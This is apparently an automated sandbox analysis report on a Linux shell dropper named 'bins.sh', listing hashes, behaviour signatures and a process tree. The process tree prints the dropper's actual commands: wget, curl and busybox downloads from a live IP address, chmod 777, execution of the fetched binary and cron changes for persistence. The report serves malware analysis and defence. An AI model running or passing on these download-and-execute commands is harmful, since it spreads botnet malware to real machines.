Analysis
-
max time kernel
124s -
max time network
154s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240226-en -
resource tags
arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
03-12-2024 00:29
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsel-20240226-en
General
-
Target
bins.sh
-
Size
10KB
-
MD5
616244bb402bee04b6b45f703b80d324
-
SHA1
eaddf7ee69008a10c656aba8958a6cecd0ba4f19
-
SHA256
43fd86667e58eeb0e59922eb2aa6773f01cbd8c39235dc00904a1eb13230eccb
-
SHA512
b1c3ac89ae943e25e2657353fa3f06f3fdc85f489cc965c7cbcc310357d75d0b1977fcd66b09aee06aaaf9986246d1c6ee29cda146aa773aaca3bfb1885857a4
-
SSDEEP
96:82/zFBpXexFta6UdZrD1iyqAIg93GCk9Nbe/axFta6MfdG0rDNFoyqAIg9OWGCki:82/zFBpHxQOGCk9N9iGCk9N6Xz7
Malware Config
Signatures
-
Contacts a large (1601) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 1 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodpid Process 739 chmod -
Executes dropped EXE 1 IoCs
Processes:
Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70ioc pid Process /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 740 Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 -
Renames itself 1 IoCs
Processes:
Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70pid Process 741 Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 -
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates/modifies Cron job 1 TTPs 1 IoCs
Cron allows running tasks on a schedule, and is commonly used for malware persistence.
Processes:
crontabdescription ioc Process File opened for modification /var/spool/cron/crontabs/tmp.n8RquO crontab -
Enumerates running processes
Discovers information about currently running processes on the system
-
Processes:
Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70curlcrontabdescription ioc Process File opened for reading /proc/77/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/751/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/757/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/795/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/826/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/860/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/920/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/965/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/1009/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/15/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/75/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/788/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/980/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/1008/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/872/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/949/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/978/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/981/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/999/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/851/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/873/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/964/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/970/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/900/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/19/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/73/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/150/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/399/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/745/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/768/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/794/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/829/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/859/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/684/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/789/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/835/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/899/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/907/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/1005/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/830/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/115/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/320/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/477/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/510/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/514/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/705/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/831/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/982/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/filesystems crontab File opened for reading /proc/772/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/782/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/807/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/892/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/1016/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/18/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/322/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/375/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/792/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/1023/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/387/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/961/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/7/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 File opened for reading /proc/767/cmdline Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 -
Writes file to tmp directory 3 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetcurlbusyboxdescription ioc Process File opened for modification /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 wget File opened for modification /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 curl File opened for modification /tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70 busybox
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:706
-
/bin/rm/bin/rm bins.sh2⤵PID:713
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵
- Writes file to tmp directory
PID:715
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵
- Reads runtime system information
- Writes file to tmp directory
PID:730
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵
- Writes file to tmp directory
PID:737
-
-
/bin/chmodchmod 777 Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/Uz08YNziENGeXipHM6OwCFU4FiNUF2eg70./Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵
- Executes dropped EXE
- Renames itself
- Reads runtime system information
PID:740 -
/bin/shsh -c "crontab -l"3⤵PID:742
-
/usr/bin/crontabcrontab -l4⤵
- Reads runtime system information
PID:743
-
-
-
/bin/shsh -c "crontab -"3⤵PID:748
-
/usr/bin/crontabcrontab -4⤵
- Creates/modifies Cron job
PID:749
-
-
-
-
/bin/rmrm Uz08YNziENGeXipHM6OwCFU4FiNUF2eg702⤵PID:747
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC2⤵PID:767
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/0xEPxt2PVsu2ZiKkeGcHvXIlF6ZQQOVDbC2⤵PID:839
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
151KB
MD56c583043d91c55aa470c08c87058e917
SHA1abf65a5b9bba69980278ad09356e53de8bb89439
SHA2562d63c81a782853efe672a1d9cb00a339ec57207b4075754a1baf1df9af466948
SHA51282ee5f3884edc2cb3e68d8634353964cdb991e250b0592a2f80f5ffb738e64860abe6d030aec0d6ab94596c275b478080579fd65b055cc9055e1ef3de6dd59a5
-
Filesize
210B
MD5dcb50a2d54adfabb396ceace37157f08
SHA1efd13226e80511adb239ab33ab8c6b2d682aaaa7
SHA2567bf6ec078c9c7b4ad5ab26741051adac4a1a400e90dccd07d0a0c805b4624194
SHA5121e4783812e85aa84354c3924b6db8380020b9b238559570d848cf98c1178df9457fdaaf2ced66fb1aac375b851c082b2ac261a9fb125942ae678c9cdc6b73dce